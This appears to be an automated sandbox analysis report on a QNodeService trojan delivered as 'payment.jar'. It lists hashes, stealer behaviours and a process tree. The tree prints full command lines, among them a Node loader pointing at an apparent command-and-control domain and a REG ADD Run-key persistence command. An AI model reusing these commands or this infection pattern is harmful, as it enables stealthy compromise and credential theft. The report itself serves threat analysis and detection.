Analysis

max time kernel: 128s
max time network: 142s
platform: windows10_x64
resource: win10v20201028
submitted: 05-11-2020 09:41
Static task: static1

Behavioral task: behavioral1
  Sample: payment.jar
  Resource: win7v20201028

Behavioral task: behavioral2
  Sample: payment.jar
  Resource: win10v20201028
General

Target: payment.jar
Size: 65KB
MD5: 493b0bef6259b1e451e304e68164c891
SHA1: a20d3ab73bafde4d7818cea9fd22de3d83072c91
SHA256: 7dabb16da3b6b7a4a98f02a852d0d6d46b11a2c60fec5749a234368e2204c8fc
SHA512: 1a300670283431ab5347dc05057d48a2736cd0119466e96a7fd15a75d451a454bc7446d15423c3362d889d006787ac93709b3e2a37acb7daf24de38d07785e40
Malware Config
Signatures

- QNodeService
  Trojan/stealer written in NodeJS and spread via Java downloader.

- Executes dropped EXE (3 IoCs)
  pid  | Process
  3992 | node.exe
  496  | node.exe
  4056 | node.exe

- Loads dropped DLL (6 IoCs)
  pid  | Process
  4056 | node.exe
  4056 | node.exe
  4056 | node.exe
  4056 | node.exe
  4056 | node.exe
  4056 | node.exe

- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

- Adds Run key to start application (2 TTPs, 2 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | reg.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\b0d9e588-45c4-441c-8935-d1f52f9740cb = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" | reg.exe

- JavaScript code in executable (3 IoCs)
  resource | yara_rule
  behavioral2/files/0x000100000001ab7a-166.dat | js
  behavioral2/files/0x000100000001ab7a-169.dat | js
  behavioral2/files/0x000100000001ab7a-173.dat | js

- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  23   | wtfismyip.com
  24   | wtfismyip.com

- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | node.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | node.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | node.exe

- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  pid  | Process
  3992 | node.exe
  3992 | node.exe
  3992 | node.exe
  3992 | node.exe
  496  | node.exe
  496  | node.exe
  496  | node.exe
  496  | node.exe
  4056 | node.exe
  4056 | node.exe
  4056 | node.exe
  4056 | node.exe
  4056 | node.exe
  4056 | node.exe
  4056 | node.exe
  4056 | node.exe
  4056 | node.exe
  4056 | node.exe

- Suspicious use of WriteProcessMemory (12 IoCs)
  description | pid | Process | procid_target
  PID 3304 wrote to memory of 2152 | 3304 | java.exe | 76
  PID 3304 wrote to memory of 2152 | 3304 | java.exe | 76
  PID 2152 wrote to memory of 3992 | 2152 | javaw.exe | 80
  PID 2152 wrote to memory of 3992 | 2152 | javaw.exe | 80
  PID 3992 wrote to memory of 496 | 3992 | node.exe | 82
  PID 3992 wrote to memory of 496 | 3992 | node.exe | 82
  PID 496 wrote to memory of 4056 | 496 | node.exe | 83
  PID 496 wrote to memory of 4056 | 496 | node.exe | 83
  PID 4056 wrote to memory of 3428 | 4056 | node.exe | 85
  PID 4056 wrote to memory of 3428 | 4056 | node.exe | 85
  PID 3428 wrote to memory of 1020 | 3428 | cmd.exe | 86
  PID 3428 wrote to memory of 1020 | 3428 | cmd.exe | 86
Processes

1. C:\ProgramData\Oracle\Java\javapath\java.exe
   Command line: java -jar C:\Users\Admin\AppData\Local\Temp\payment.jar
   PID: 3304
   - Suspicious use of WriteProcessMemory

   2. C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\4e5621fa.tmp
      PID: 2152
      - Suspicious use of WriteProcessMemory

      3. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
         Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain empefarm.ddns.net
         PID: 3992
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory

         4. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_SAz58l\boot.js --hub-domain empefarm.ddns.net
            PID: 496
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory

            5. C:\Users\Admin\node-v14.12.0-win-x64\node.exe
               Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_SAz58l\boot.js --hub-domain empefarm.ddns.net
               PID: 4056
               - Executes dropped EXE
               - Loads dropped DLL
               - Checks processor information in registry
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of WriteProcessMemory

               6. C:\Windows\system32\cmd.exe
                  Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "b0d9e588-45c4-441c-8935-d1f52f9740cb" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
                  PID: 3428
                  - Suspicious use of WriteProcessMemory

                  7. C:\Windows\system32\reg.exe
                     Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "b0d9e588-45c4-441c-8935-d1f52f9740cb" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                     PID: 1020
                     - Adds Run key to start application